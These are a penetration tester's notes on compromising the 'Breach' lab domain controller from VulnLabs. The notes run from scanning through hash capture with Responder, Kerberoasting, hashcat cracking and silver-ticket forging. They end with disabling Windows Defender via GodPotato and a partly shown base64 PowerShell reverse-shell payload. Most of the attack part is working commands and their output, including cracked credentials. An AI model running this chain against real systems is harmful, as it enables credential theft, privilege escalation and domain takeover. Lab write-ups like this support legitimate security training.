Breach

This is not a writeup, just my notes about VulnLabs machines.

Operating System: Microsoft Windows Server 2022 Datacenter

Chain: False

Credentials

Username	Password	Method	Scope
JULIA.WON	Computer1	LLMNR & NBT-NS Poisoning	domain User
svc_mssql	Trustno1	Kerberoasting	Service Account

✅ Valid Usernames

George.Williams@breach.vl
Guest@breach.vl
Julia.Wong@breach.vl
BREACHDC$@breach.vl
Hilary.Reed@breach.vl
Jasmine.Price@breach.vl
Claire.Pope@breach.vl
Administrator@breach.vl
Diana.Pope@breach.vl
Christine.Bruce@breach.vl
Lawrence.Kaur@breach.vl
Jasmine.Slater@breach.vl
svc_mssql@breach.vl
Hugh.Watts@breach.vl

🔑 Passwords list

Computer1

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Sat Apr  5 22:28:57 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_breach_tcp_allports -vvv 10.10.106.9
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-06 02:35:21Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53961/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
54183/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service Enumeration

DNS

• Not vulnerable to AXFR Zone Transfer

SMB

• Allows null session authentication

• Allows guest session authentication (random username)

• OS:

  • Windows 10

  • Windows Server 2019

  • Windows Server 2016

• RID bruteforce is allowed retrieving usernames

  • Not users with UF_DONT_REQUIRE_PREAUTH set (asreproast)

• Not users using username as password

• share folder has WRITEand READ permission.

Exploitation

LLMNR & NBT-NS Poisoning attack

The tester used the ntlm_theft python tool to generate a malicious file to allowed to capture NTLMv2

python3 ntlm_theft.py -s 10.8.5.48 -f invoce -g all

Once the file was generated the tester proceeded to upload the file to the SMB public share. Capturing successfully the Julia.Wong's NTLMv2 hash.

sudo responder -I tun0 -dwv
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

<SNIF>

[+] Listening for events...


[SMB] NTLMv2-SSP Client   : 10.10.109.16
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:da6bf7288a9319b0:F97691FAFE6D734DA047F7E14FA4C1E1:01010000000000008060E1B581A6DB017CFC1736425E729B00000000020008004D0052003400410001001E00570049004E002D00510059005A0050004A0032004300590051004F00350004003400570049004E002D00510059005A0050004A0032004300590051004F0035002E004D005200340041002E004C004F00430041004C00030014004D005200340041002E004C004F00430041004C00050014004D005200340041002E004C004F00430041004C00070008008060E1B581A6DB0106000400020000000800300030000000000000000100000000200000C22119EE4891FA5C12884CC518A1E8C3A84843FEA0DBA323420868CF72DA7DC10A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000

Finally, the tester use hashcat tool to retrieve JULIA.WONG's plaintext credential

hashcat -m 5600 Julia.Wong.ntlmv2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

<SNIF>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

JULIA.WONG::BREACH:da6bf7288a9<SNIF>e0038000000000000000:Computer1

Retrieving svc_mssql's Ticket Granting Service

❯ nxc ldap 10.10.109.16 -u 'Julia.Wong' -p 'Computer1' --kerberoast kerberoast.hashes
SMB         10.10.109.16    445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
LDAP        10.10.109.16    389    BREACHDC         [+] breach.vl\Julia.Wong:Computer1 
LDAP        10.10.109.16    389    BREACHDC         Bypassing disabled account krbtgt 
LDAP        10.10.109.16    389    BREACHDC         [*] Total of records returned 1
LDAP        10.10.109.16    389    BREACHDC         sAMAccountName: svc_mssql memberOf:  pwdLastSet: 2022-02-17 05:43:08.106169 lastLogon:2025-04-05 23:21:38.187318
LDAP        10.10.109.16    389    BREACHDC         $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$d320fad6bb2be1deeb42bdae6c979a52$786461ee091a421c15a09de2b1f12feca70da1fed9e8e4524a6fc5419026ed74792968efe48de6486730157b04ecd4aef27a918720e002bb38c1b5c2ab24b9a636e87618ff8c7660a48b1b690c6b95766393ff3331b176b994fa29a9348bb3efcf5d3d1a6af5e938fac1c78d3d70f91b36eb5ca2eb2dbc601302deef077d84511afc9d1206b3c77846f76775d6d8aafc4fa64017e2748e329c9a4fc3b62edd7084fd1092a4460f6abb9750373d43055b8521e05d45e94cbf417641d7ac7ec7ca2c80b162db49ffaf001cbc63d58fa0bfc94f3cc2d269eb50b72fe8e27e95cf35e154ad5e6053c2ad2ebbe4455185adc2796bbe9c5fedceb7c3048e2a7255096a93cd12b5e7181efc0bc6ec717818aaad0018ff79ac8c6bed3f0930413fd47d583cbdc729bf1597bd3e2773dce3aa9754f57c45bd60bbc38d6a20ced3ead3d938c51369dd00f020fe3847979d8b2a8517ab705779600876bebfa06ae7196457224e0092ef136e646bd184f4ed6ef9c262f55bc5407e14f041c571f8367650ae8629d27a13dc0c485b3dfeed0d6e98cddc64c6064e776092bd0bba4c42aa7eb90f9765e71af789fcb63348a9702fcf2f11008f3d3a47c6963c82b54aba67a7a5a0409582a895b10ff81d6b80143d37c44cc506be40df8a88f582c4b9e08f8be21e462c44e1ebb5a819f24de78b0d16656e507c1533ca03e41d25c5db7c94b87a19fb08ccca1551e85b48d213cb2aeaf942e2b41d412afdfda0babe2580e8b425d0ed2af7c0931f89265e83839505cbc5d0f09186656dfb1b20812cccd2566620d7b37aa11da796de03365448e72b5079fe5c039775d508720bb14d487257c906ec3c836b9c0a2d44cad557c491ad4abfcc15e76b8c3ac873b8a9d645e1969bdb7ebb3f0378d1a98adc04b4e00dc28b6d958865dbb5be7a58ba296878313c8f48d02a2d5c35b0013e17a5326681eacfb587a42c66ce129a9035179760a005f4212a72da2a576b1317ac963ea837e93c51871a89218dfd8798a1e8fec4758c574d87fe80e1ae8432066100df36b97a52ec1ca521bd740a5d8e76a14e9a37da9fa4790122f25acb30b184cd54ceb035f85e888127ebb305a7bb9649a5f4a9fbfb9aae6a9b4747347bfdabb987402e024f8269700ad96aa5c09f4ae828329159d5bd82adcd09fc34d5dbd653fe7adbec2603a8785a7c9a8869d4eeee717711b473f48e79ff66f2b8299aa33761f81abeab7d4f3c762c80a1a26c66dc063e9c9ad9c57204997d206dab2270713b00d4b52cd9d3d7c96b162ba7a15844888bd48bf130031e1bbc548f7d47d689f3ff33570de49380f27393131d5bc73dfe27debd22b83fd48073a46c9d443312a4d7e1b1ab98e4f3a2fc20dde14bea5eedf86bfbce32c48eb06eeeed0b539e9283c9a8728edb68c304d6aed10344b8a9ab542b4d5508e9447c3663445d106b52924f4c978f111ce4f29bc2

Once the ticket was retrieved the tester proceeded to cracking using hashcat.

❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$d320fad6bb2be1deeb42bdae6c979a52$786461ee091a421c15a09de2b1f12feca70da1fed9e8e4524a6fc5419026ed74792968efe48de6486730157b04ecd4aef27a918720e002bb38c1b5c2ab24b9a636e87618ff8c7660a48b1b690c6b95766393ff3331b176b994fa29a9348bb3efcf5d3d1a6af5e938fac1c78d3d70f91b36eb5ca2eb2dbc601302deef077d84511afc9d1206b3c77846f76775d6d8aafc4fa64017e2748e329c9a4fc3b62edd7084fd1092a4460f6abb9750373d43055b8521e05d45e94cbf417641d7ac7ec7ca2c80b162db49ffaf001cbc63d58fa0bfc94f3cc2d269eb50b72fe8e27e95cf35e154ad5e6053c2ad2ebbe4455185adc2796bbe9c5fedceb7c3048e2a7255096a93cd12b5e7181efc0bc6ec717818aaad0018ff79ac8c6bed3f0930413fd47d583cbdc729bf1597bd3e2773dce3aa9754f57c45bd60bbc38d6a20ced3ead3d938c51369dd00f020fe3847979d8b2a8517ab705779600876bebfa06ae7196457224e0092ef136e646bd184f4ed6ef9c262f55bc5407e14f041c571f8367650ae8629d27a13dc0c485b3dfeed0d6e98cddc64c6064e776092bd0bba4c42aa7eb90f9765e71af789fcb63348a9702fcf2f11008f3d3a47c6963c82b54aba67a7a5a0409582a895b10ff81d6b80143d37c44cc506be40df8a88f582c4b9e08f8be21e462c44e1ebb5a819f24de78b0d16656e507c1533ca03e41d25c5db7c94b87a19fb08ccca1551e85b48d213cb2aeaf942e2b41d412afdfda0babe2580e8b425d0ed2af7c0931f89265e83839505cbc5d0f09186656dfb1b20812cccd2566620d7b37aa11da796de03365448e72b5079fe5c039775d508720bb14d487257c906ec3c836b9c0a2d44cad557c491ad4abfcc15e76b8c3ac873b8a9d645e1969bdb7ebb3f0378d1a98adc04b4e00dc28b6d958865dbb5be7a58ba296878313c8f48d02a2d5c35b0013e17a5326681eacfb587a42c66ce129a9035179760a005f4212a72da2a576b1317ac963ea837e93c51871a89218dfd8798a1e8fec4758c574d87fe80e1ae8432066100df36b97a52ec1ca521bd740a5d8e76a14e9a37da9fa4790122f25acb30b184cd54ceb035f85e888127ebb305a7bb9649a5f4a9fbfb9aae6a9b4747347bfdabb987402e024f8269700ad96aa5c09f4ae828329159d5bd82adcd09fc34d5dbd653fe7adbec2603a8785a7c9a8869d4eeee717711b473f48e79ff66f2b8299aa33761f81abeab7d4f3c762c80a1a26c66dc063e9c9ad9c57204997d206dab2270713b00d4b52cd9d3d7c96b162ba7a15844888bd48bf130031e1bbc548f7d47d689f3ff33570de49380f27393131d5bc73dfe27debd22b83fd48073a46c9d443312a4d7e1b1ab98e4f3a2fc20dde14bea5eedf86bfbce32c48eb06eeeed0b539e9283c9a8728edb68c304d6aed10344b8a9ab542b4d5508e9447c3663445d106b52924f4c978f111ce4f29bc2:Trustno1

Post Exploitation

Crafting Silver ticket to impersonate Administrator account

❯ impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn MSSQLSvc/BREACHDC.breach.vl Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
❯ KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k BREACHDC.breach.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

Using HOAXShell to bypass the AV and gain foothold on the system

Compromise Domain Controller

Since the obtained shell is running under a service account, the SeImpersonatePrivilege token is active.

To compromise the domain, the tester performed the following steps:

1. Uploaded the GodPotato binary to the target machine.
2. Disabled Windows Defender’s real-time protection using the following command:

PS C:\Temp > .\GodPotato-NET4.exe -cmd 'cmd /c powershell.exe Set-MPPreference -DisableRealTimeMonitoring $true'

Then, executed a reverse shell by invoking a Base64-encoded PowerShell payload:

PS C:\Temp > .\GodPotato-NET4.exe -cmd 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAd<SNIF>